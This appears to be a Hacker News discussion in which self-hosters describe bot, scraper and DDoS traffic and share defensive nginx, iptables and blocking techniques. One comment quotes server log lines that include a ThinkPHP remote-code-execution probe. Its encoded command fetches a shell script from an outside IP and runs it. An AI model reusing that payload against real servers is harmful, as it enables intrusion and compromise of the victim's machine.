Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.
The web is really stuck between a rock and a hard place when it comes to this. Proof of work helps website owners, but makes life harder for all discovery tools and search engines.
An independent standard for request signing and building some sort of reputation database for verified crawlers could be part of a solution, though that causes problems with websites feeding crawlers different content than users, and does nothing to fix the Sybil attack problem.
That said, we can likely do better. Cloudflare does well in part because it carries so much traffic, so it has data from across the internet. Smaller operators just don't get enough traffic to deal with abusive IPs without banning entire ranges indefinitely, which is not ideal. I hope to see a solution like CrowdSec, where reputation data can be crowdsourced to block known bad bots (at least for a while, since they are likely borrowing IPs) while using low-complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask of Anubis upstream, which is likely busy enough dealing with the challenges of what it already does at the scale it operates, but that does leave some room for further innovation for whoever wants to go for it.
In my opinion there is no reason a drop-in solution couldn't mostly resolve these problems and make it easier for hobbyists to run services again.
As such, I don't identify with the author of this post and the attempt to resist Cloudflare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates does not exist, any more than a country without a government where everyone plays nice and mostly cooperates. It's wishful thinking. We already tried this with email, and we're back to gatekeepers. Pretending the web will be different is ahistorical.
This is particularly annoying as knowing where people come from is important.
It's just another reason to give up making stuff, and give in to the FAANG and the AI enshittification.
:-(
How about a reputation system?
Attaching it to an IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing the anti-abuse onus onto ISPs)?
This is basically what happened to email/SMTP, for better or worse :-S.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don't care about knowing your exact identity, but being able to ban a person without them simply registering a new account, and being able to stop people from registering thousands of accounts, would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
It would be way too easy for the current regime (whoever that happens to be) to criminalize random behaviors (trans people? Atheists? A random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
20+ years ago there were mail blacklists that basically blocked residential IP blocks, as there should not be servers trying to send normal mail from there. Now you must try the opposite: blacklist blocks where only servers, not end users, can come from, as there are potentially badly behaved scrapers in all major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests from misbehaving companies, so that door is a bad mitigation too.
International law enforcement on the Internet would also subject you to the laws of other countries. It goes both ways.
Having to comply with all of the speech laws and restrictions in other countries is not actually something you want.
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Of course everything sounds plausible when speaking at such a high level.
Apple and Alphabet seem positioned to easily enable it.
https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
I really don't understand why they do this, and it's mostly shady origins, like VPS game server hosters from Brazil and so on.
I'm at the point where I capture all the traffic and look for SYN packets, then check the RDAP records for them to decide whether to drop that organization's entire subnets, whitelisting things like Google.
Digital Ocean is notoriously a source of bad traffic, they just don't care at all.
> Fail2ban was struggling to keep up: it ingests the Nginx access.log file to apply its rules but if the files keep on exploding…
> [...]
> But I don’t want to fiddle with even more moving components and configuration
You can configure nginx to do rate-limiting directly. Blog post with more details: https://blog.nginx.org/blog/rate-limiting-nginx
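A minimal sketch of what that looks like, assuming a standard nginx setup (the zone name "perip" and the numbers are placeholders to tune, not recommendations):

# In the http {} block: track clients by IP, allow ~10 requests/second.
limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s;

server {
    location / {
        # Absorb bursts of up to 20 requests; reject the excess with 503.
        limit_req zone=perip burst=20 nodelay;
    }
}

Rejections show up in the error log, so fail2ban could watch that much smaller file instead of ingesting the whole access.log.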
It's very explainable. And somehow, like clockwork, there are always comments saying "there is nothing new, the Internet has always been like this since the 80s".
You know, part of me wants to see AI proliferate into more and more areas, just so these people finally wake up and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own reputation is constantly attacked and destroyed by a thousand cuts, not just online but in their own trusted circles, and when they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to them, especially when you use TLS, I'm guessing because the certificates end up in a big, easily accessible index (the certificate transparency logs). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss off some organization and (I'm assuming) they hire some bad actor to try to take you offline.
Dealing with crawlers, botnets, automation gone wrong, pissed-off humans and so on has been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? I've hosted stuff across a wide range of providers, and it seems to happen on all of them.
I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if the user does not present a certificate. My devices, which can present a cert, connect seamlessly. It's a one-time setup, but once done you can forget about it.
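A sketch of that setup, assuming nginx is the reverse proxy (certificate paths and the upstream address here are placeholders):

server {
    listen 443 ssl;
    ssl_certificate        /etc/nginx/certs/server.crt;
    ssl_certificate_key    /etc/nginx/certs/server.key;
    # Only clients presenting a cert signed by this private CA get through.
    ssl_client_certificate /etc/nginx/certs/client-ca.crt;
    ssl_verify_client      on;

    location / {
        proxy_pass http://127.0.0.1:8080;  # the self-hosted service
    }
}

Requests without a valid client certificate are rejected before they ever reach the service.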
Another potential cause: it's way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I'd wager even the less smart LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you get an order-of-magnitude increase in traffic across the internet. This has been possible since what, sometime in 2023? Not sure if the patterns would line up, but it's just another guess at the cause(s).
edit: words
You're absolutely right: AWS, GCP, Azure and the others do not care, and AWS and GCP especially are massive enablers.
I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used wildcard certs to stay out of the certificate transparency logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.
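The basic-auth part is only a couple of lines in most reverse proxies; a sketch assuming nginx (the realm text and htpasswd path are placeholders):

location / {
    auth_basic           "restricted";
    auth_basic_user_file /etc/nginx/.htpasswd;
}

It won't stop a determined attacker, but it keeps drive-by crawlers and scanners from ever seeing what software is behind it.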
If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or TikTok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have their best interests in mind.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor the internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?
If you want to trade with me, a country that exports software, let's agree to both criminalize software piracy.
No reason why this can't be extended to DDoS attacks.
The only way to solve these problems is to use some large hosted platform that has the resources to constantly manage these issues. That would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
The conclusion back then was that it's impossible to make a threshold that is both low enough and high enough.
You need some other mechanism that can distinguish bad traffic from good (even if imperfectly), and then adjust the threshold based on it. See, for instance, "Proof of Work can Work": https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
This whole enterprise is clearly run by exceptionally dumb people, since you can just clone all the code I host there directly from upstreams...
[16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/linux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
[16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linux/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
[16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/linux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
[16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/linux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
[16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/linux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173fa619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250ms
If this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
Win Win.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gate keeping - the people on it were selected through technical skill being required. Generally people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
I've updated my heuristic to single out only the worst offenders, and created honeypots to collect IPs and respond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.
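A crude sketch of the honeypot half, assuming nginx (the bait path and log file are made up; the point is that only bots probing for WordPress on a non-WordPress site will ever hit it):

# No human visitor requests this on a non-WordPress site.
location /wp-login.php {
    access_log /var/log/nginx/honeypot.log;
    return 403;
}

Something like fail2ban can then ingest honeypot.log and ban every IP that shows up in it.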
The only solution seems to be to constantly abandon those things and move on to new frontiers to enjoy until the cycle repeats.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
Very crudely, if you think that a request costs the server ~10ms of compute time and a phone is 30x slower, then you'd need 300ms of client compute time to equal it, which seems very reasonable.
The only problem is you would need a cryptocurrency that a) lets you verify tiny chunks of work, b) can't be done faster on other hardware than on a phone, and c) lets a client mine money without being able to actually spend it ("homomorphic mining"?).
I don't know if anything like that exists but it would be an interesting problem to solve.
> It would be way too easy for the current regime (whoever that happens to be) to criminalize random behaviors (trans people? Atheists? A random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
That's not how culture evolves. You don't necessarily need to have a problem for a solution to be developed. You can very well have a technology developed for other purposes, or just for exploration's sake, and then, once the tech exists, uses for it start to pop up post hoc.
You are therefore ignoring the immense benefit of access to information that this technology brought: it wasn't necessarily a problem for the common man, but once access to information is popularized, people adapt and grow dependent on it. Just like electricity.
In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".
While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?
Last year, in a fit of desperation, I added Cloudflare. It has a brute-force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. Is it great UX? No, but at least the site isn't getting hammered from various locations in Asia. Cloudflare also lets me block entire countries, although that seems to be easily fooled.
I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.
There need to be some hard and fast rules put in place, somehow, to stop the madness.
Honestly I have no idea how well it works, my logs are still full of bots. *Slow* bots, though. As long as they’re not ddosing me I guess it’s fine?
I believe the correct verb is monetised.
My tiny personal web servers can withstand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
People with dialup telephones never asked for a smartphone connected to the internet. They were just as happy back then, or even happier, because the phone didn't eat up their time or cause posture problems.
Sure, shopping was slower without the Amazon website, but it was no less happy an experience back then. In fact, homes had less junk and people saved more money.
Messaging? Sure, it makes you spend time in 100 WhatsApp groups where 99% of the people don't know you personally.
It helped companies sell more of their junk more quickly.
It created bloggers and content creators who lived in an imaginary world, thinking that someone really consumes their content.
It created karma beggars who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies which don't solve any of the world's problems or basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to, maybe not prevent, but somewhat alleviate, the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
--
*) For the lack of a better word.
79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
...
145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"
145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
or:
"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
These are just some examples, but they happen pretty much daily :(
Probably someone DDoSing a Minecraft server or something.
People in games do this where they DDoS each other. You can get access to a DDoS panel for as little as $5 a month.
Some providers allow spoofing the source IP; that's how they do these reflection attacks. So you're not actually dropping the sender of these packets, but the victims.
Consider turning the reverse path filter to strict mode as a basic anti-spoofing measure and see if it helps:
# strict reverse path filtering, e.g. in /etc/sysctl.conf (apply with sysctl -p)
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
Though I have to admit I don't know who your target audience would be. Self-hosting orgs don't tend to be flush with cash
It is fun to create honeypots for things like SSH and RDP and automatically block the source IPs
You're not wrong that abuse would be a massive issue, but I'm on the other side of this and need Amazon to do something, anything.
A friend of mine, who had a similar opinion on technology, once watched a movie that seemed to reinforce it in his eyes, and tried to persuade me as if it was the ultimate proof that all technology is evil.
The plot depicted a happy small tribe of indigenous people deep in the rainforest, who had never seen any artifacts of civilization. They never knew war, homicide, or theft. Basically, they knew no evil. Then, one day, a plane flies over and someone frivolously tosses an empty bottle of Coca-Cola out of the window (sic!). A member of the tribe finds it in the forest and brings it back to the village. And, naturally, everyone else wants to get hold of the bottle, because it's so supernatural and attractive. But the guy decides he's the only owner, refuses, and then of course kills those who try to take it by force, and all hell breaks loose in no time.
"See," concludes my friend triumphantly, "the technology brought evil into this innocent tribe!"
"But don't you think that evil already lurked in those people to start with, if they were ready to kill each other for shiny things?" I asked, quite baffled.
"Oh, come on, so you're just supporting this shit!" was the answer...
I worked in e-commerce previously; we reduced fraud to almost zero by banning non-local cards. It affected a few customers who had international credit cards, but not enough to justify dealing with the fraud. Sometimes you just need to limit your attack surface.
It's possible that the services that reward users for running proxies (or that are bundled with mobile apps, with a notice buried in the license) would start rewarding and hiding compute work as well. There's currently no money in it because proof-of-work is so rare, but if that changes, their strategy might too.
I still think it is possible with some customized variant of RandomX. The server could even make a bit of money by acting as a mining pool and forcing the clients to mine a certain block template. It's just that it would need to be installed as a browser plugin or something; it wouldn't be efficient running within a page.
Also, the verification process for RandomX is still pretty intensive, so there is a high minimum bar for where it would be feasible.
(An Alibaba /16? I block not just 3/8, but every AWS range I can find.)
What's next, blaming the electromagnetic field and the devices that modulate it for being full of propaganda, violence and all kinds of filth humankind is capable of creating? You find what you seek, and if not, keep turning that damn knob further.
But since you insist, some good frequencies to tune into:
1) Self-education in whatever field of practical or theoretical knowledge you're interested in;
2) Seeing a wider picture of the world than your local authorities would like you to (yes, basically seeing that all the world's kings are naked, which is the #1 reason why the Internet became such a major pain in the ass for the kings' trade union, so to say);
3) Being able to work from any location in the world with access to the Internet;
4) You mentioned selling trash en masse worldwide, but I know enough examples of wonderful things produced by independent people and sold worldwide.
The list could be longer, but I hate doing useless and thankless work.
Then there's also the issue of dependence on US-based services, but that may not be an issue for you.
All of this reminds me of some of Gibson's short stories I read recently and his description of Cyberspace: small corporate islands of protected networks in a hostile sea of sapient AIs ready to burn your brain.
Luckily, LLMs are not there yet, except you can still get your brain burnt from AI slop or polarizing short videos.
Minutes after coming into existence, I have half a dozen connections to sshd from Chinese IP addresses.
That teaches the use of SSH keys.
I'd hope other major clouds would do the same
Sadly, like many people, I just deal with the traffic as opposed to getting around to actually writing a tool to block it.
Why should it be an ISP's job to police what their users can and can't do? I really don't think you want service providers to start moderating things.
Does your electricity company ban the use of red light bulbs? Would everyone be ok with such restrictions?
I think it's one of the multi-faceted problems where technology (a "moat", "palisade", etc. for your "tribe") should accompany social changes.
My then-PageRank-6 business website got attacked non-stop starting around 2008.
At this time my log files exploded as well: the Script Kiddies entered the arena.
At the time, the first tools leaked to the public that could scan IP ranges and check websites for certain attack vectors.
I miss the era from CompuServe and AOL around 1995 till 2008.
Web Rings, Technorati, fantastic Fan Sites before Wikipedia - wholesome.
Term: Script Kiddies https://en.wikipedia.org/wiki/Script_kiddie
Anyone who owns a chrome extension with 50k+ installs is regularly asked to sell it to people (myself included). The people who buy the extensions try to monetize them any way they can, like proxying traffic for malicious scrapers / attacks.
But I agree that keys are not optional anymore.
Today, my entire network of self hosted stuff exists in a personal wireguard VPN. My firewall blocks everything except the wireguard port (even SSH).
It really can not be overstated how unsustainable the status quo is.
> moving the entire hosting to CloudFlare that will do it for me ... nor do I want to route my visitors through tracking-enabled USA servers
Isn't there some EU equivalent to CloudFlare he can use?
It's hard to admit, but DDoS mitigation is an essential part of having even a simple website these days.
# Build an iptables chain that drops traffic from a list of abusive ASNs,
# using a full BGP table snapshot from RouteViews.
TEMPDIR=$(mktemp -d)
trap 'rm -r "$TEMPDIR"' EXIT
curl https://archive.routeviews.org/oix-route-views/oix-full-snap... -Lo "$TEMPDIR/snapshot.bz2"
# Pull out every announced prefix whose origin AS is on the bad list.
bzgrep -E " (15828|213035|400377|399471|210654|46573|211252|62904|135542|132372|36352|209641|7552|36352|12876|53667|138608|150393|60781|138607) i" "$TEMPDIR/snapshot.bz2" | cut -d" " -f 3 | sort -u > "$TEMPDIR/badranges"
# Recreate the BAD_AS chain and hook it into INPUT.
iptables -N BAD_AS || true
iptables -D INPUT -j BAD_AS || true
iptables -A INPUT -j BAD_AS
iptables -F BAD_AS
for ROUTE in $(cat "$TEMPDIR/badranges"); do
    iptables -A BAD_AS -s "$ROUTE" -j DROP
done
Look at the HN karma system--you start with limited features, and as you show yourself a good user, you get more features (and also trust/standing with the community). "Resetting" your identity only ever loses you something.
Apply the same thing to a git host getting hammered--by default, users can't view the history online (they can still clone), but as your identity establishes reputation (through positive interactions, or even just browsing in a non-bot-like manner), your reputation increases and you get rate-limited access or something.
This is essentially where a lot of spam ended up--it used to be that your mail was deliverable until you acted poorly, then your reputation was bad and your deliverability went down. Now it more closely resembles this--your reputation is bad until you send enough good mail and take enough good actions (DKIM/SPF, etc) to show yourself as good.
The issues really all stem from "resetting your identity gets you back in good standing". Once you take that out of the mix, you no longer need to worry much about limiting identities, tying them to the real world, ensuring they're persistent, or many of the other hard problems that come up.
The internet has been full of rogue actors and soft targets since shortly after its inception.
It may have had a small enough user base to be considered a safe haven for a brief period, but it was before my time.
> If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it.
Personal actions (and their safety) are a different category from environments (and their safety).
IPv6 would solve this, and we'd get the end-to-end nature of the internet back. So when will everybody start screaming for IPv6?
Shouldn't take more than a second to perform the motions as a website visitor.
If the movement is suspiciously smooth, or isn't accelerated and decelerated as a human hand would do it, it's a bot - or an agentic browser.
BitTorrent is just as susceptible to this, it's just there's currently no economic incentive to try to exhaustively scrape it from 50,000 VPS nodes.
AS4229 Zenlayer (Singapore) PTE. LTD
AS21859 ZEN-ECN, US
AS45102 ALIBABA-CN-NET Alibaba US Technology Co., Ltd., CN
AS132203 TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue, CN
AS136907 HUAWEI INTERNATIONAL PTE. LTD.
That's 4392 contiguous IP ranges.
I have accessed websites that do not use ICANN DNS nor TLS, sometimes on ports other than common ones like 80, 443, etc.
The term "website" to me means an IP address from which an operator publishes hypertext (HTML) and responds to HTTP requests
But others might define "website" differently
On my home network, for experimentation, I create my own TLDs in a custom root.zone and use non-TLS per-packet encryption to serve HTML over UDP instead of TCP
The blog post refers to "safe haven"
Usually "safe haven" means there is something that one is seeking protection from
It is not clear from the blog post what the author believes "the internet" was previously a safe haven from
Not to mention the www != the internet
It's possible the broader internet, including the many "unused" ports between 0 and 65535, could be a "safe haven" from the web, what with the "AI bots"
No, it really isn't. Unless you mean like on the BGP level. But it's p2p in the sense where you have to trust every party not to break the system. It's like email or mastodon, it doesn't solve the fundamental sybil problem at hand.
>BitTorrent is just as susceptible to this,
In BitTorrent, things are hosted by ad-hoc users whose numbers are roughly proportional to the number of downloaders. It is not unimaginable that you could staple a reputation system on top of it, like private trackers already do.